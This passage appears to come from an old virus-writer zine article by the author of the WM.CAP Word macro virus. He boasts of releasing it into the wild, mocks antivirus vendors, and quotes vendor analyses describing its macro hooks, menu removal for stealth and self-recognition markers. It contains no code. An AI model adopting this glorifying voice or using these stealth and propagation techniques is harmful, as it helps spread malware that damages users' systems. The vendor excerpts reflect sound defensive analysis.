1. Introduction Factz prove for themselvez. Macro virii have become one of the most comon type of computer virus. While the latter sounds like a press release, we cant deny that unfortunately it is becomin true. "Unfortunately" becoz as u will see later, macro virii unlike other type of computer virii, are not really very dificult to write, in fact much of them have been coded in a very simple way, followin a straightforward programin aproach. While there could be some few exceptionz to the rule, macro virii in general dont prove to deserve that kind of atention that other more interestin type of computer virii mite do, regardin other innovative infection techniqz, new wayz of residency, improved methodz for trapin file activity and the complexity of the virus code itself. Featurez which are very dependent to a great extent on the skillz of the VXer himself.

1.1. Macro virus hype But leavin aside that atonishin publicity surroundin macro virii and now followin a much more objetive aproach: what lies behind the creation of a macro virus? is it really hard to write such virusez? why so much hype bout Concept? well, not really. Much of that fuzz was nonsense, another press release biten and exagerated by the obfuscating media. I rememeber at the time Concept was big newz, AVerz started to say repeatedly again and again

that such macro virii were fairly easy to write and that they could be more infectious and comon than any other virus type. Yea AVerz, strangely tho, said the mean and lean truth. So now they come, shoot our mindz and then wash their handz pretendin they have nothin to do with the macro virus hype. After all, we are the "kidz" so we are the guilty onez, we are the bad guyz and they are of course the heroez of the movie. Same old story.

2. WM.CAP: a complex macro virus? CAP was a macro virus i wrote durin a bored December weekend after endin classes for the quarter and startin my xmas vacationz. It was also my first and last macro virus until i lost all of my interest in this stuff and focused my atention on other much more interestin virus related topicz :) It began as a curiosity of mine when tryin to understand for myself how these virusez worked and how much they could spread for themselvez. The CAP virus made its way into the wild the same way most other virusez do. It was writen in a simple 386 machine runin Windoze 3.1, it was tested in both english and spanish versionz of Word 6, and was finaly released and spread as with any other macro virus. Yea, it has some pretty kewl featurez but they are far from bein extraordinary or complex as some AVerz put it, especialy an AVer named Miko Hyppnen from Datafellowz (F-Potatoe), a very nice dude, author of F-Potatoe buletinz, who btw behaved very kind in his last isue when he encouraged people to send their "opinion on virus writin" to my Hotmail mailbox. I wont forget that one, Miko, very nice from u, pal. However it was also the first time i thanked the phuckin mother who hacked my Hotmail acount, hrmph @&%#..

3. In the newz Shortly after CAP was released, there apeared a seriez of increasin reportz posted on several newsgroupz, especially from alt.comp.virus. Userz were suspectin about a new macro virus removin the Toolz/Macro and Toolz/Customize menu itemz from their Word enviroment. A couple of monthz later, CAP was bein reported at diferent regionz worldwide. Was CAP just another lucky virus or there was somethin more behind? Well, just keep readin if u want to know the mean and lean truth. #8) But before this lets listen to what AVerz have to say about CAP, that mite help us understand some more about CAP's functionin, mmm.. well, just a bit coz u know how some AVerz are, regardin their virus descriptionz. They feed on hype describin how good their AV programz detect virusez, instead of describin how the virusez really work and how some of them are able to defeat and nulify their stuff. Most of the AV programz agree they can safely remove all (removable) virusez they detect. Factz prove this is not true. None of the macro AV programz, except perhaps new versions of F-MacroW, have been able to remove properly all of the CAP spontaneously generated variantz. And as u'll see later in this article, this behavior could have been made much more complex on purpose.

3.1. Dr.Solomon speaks (*) Dr.Solomon - http://www.drsolomon.com/vircen/valerts/wmcap.html - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 WM/CAP This macro virus appeared first in February 1997 and has quickly become widespread. The basic virus consists of one large macro called CAP (hence the name) which is called from the virus' other

macros - AutoExec, AutoOpen, FileSave, FileSaveAs, FileTemplates, ToolsMacro, FileClose, FileOpen and AutoClose. When the virus replicates, the first thing it does is to copy the basic set of 10 macros. The virus then browses the WinWord menu items, collects their names, (they could be different in different language versions, or customized versions of WinWord), and intercepts up to 5 of these additional macros - placing a pointer to the main CAP macro inside them. If there are any system macros defined in a global template before the infection - they are deleted. The virus also removes the menu items Tools/Macro and Tools/Customize. The File/Templates menu item is present after infection but it does not work. In essence, then, the virus consists of 10 basic English macros and up to 5 additional macros taken from the menus if they are not standard for the English language version of WinWord. The virus uses information from the macro description field, (at the bottom of Tools/Macro box), for self recognition of its core macros. These have "F%" at the beginning of a description (FileOpen has F%O, FileClose - F%C, FileSave - F%S and FileSaveAs - F%SA). The virus has no damaging payload except that it removes system macros defined in the global template. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

3.2. Sophos speaks (*) Sophos - http://www.sophos.com/virusinfo/analyses/winwordcap.html - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Virus analyses Winword/CAP Virus Name:Winword/CAP. Aliases: None known. Type: MS Word document infector. Resident: Yes, within Word environment. Stealth: Yes. Empty macros are used to prevent Word showing menu items. For example, the ToolsMacro (or ExtrasMakro under German Word) is empty, which prevents the use of the ToolsMacro to see whether or not there are macros present. The virus also removes the menu item itself so that it does not even appear in the list of available choices. Trigger: None. Payload: None. Comments: The Winword/CAP virus installs the following macros: FileTemplates, ToolsMacro, FileSaveAs, FileClose, AutoClose, FileSave, FileOpen, AutoOpen, AutoExec and CAP. In addition, the virus will find the current local language version of the macros and will install these as well as the English ones. For example, if the virus infects a German version of Word, it will also install macros named DateiOffnen, DateiSpeichern, DateiSpeichernUnter, DateiSchliebenOderAllesSchlieben. With the exception of the CAP macro itself, all the macros are very short stubs which either call subroutines within CAP or do nothing at all. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

3.3. McAfee speaks (*) McAfee - http://www.mcafee.com/support/techdocs/vinfo/vm007.asp - - - - - - - - - - - - - - - - - - - -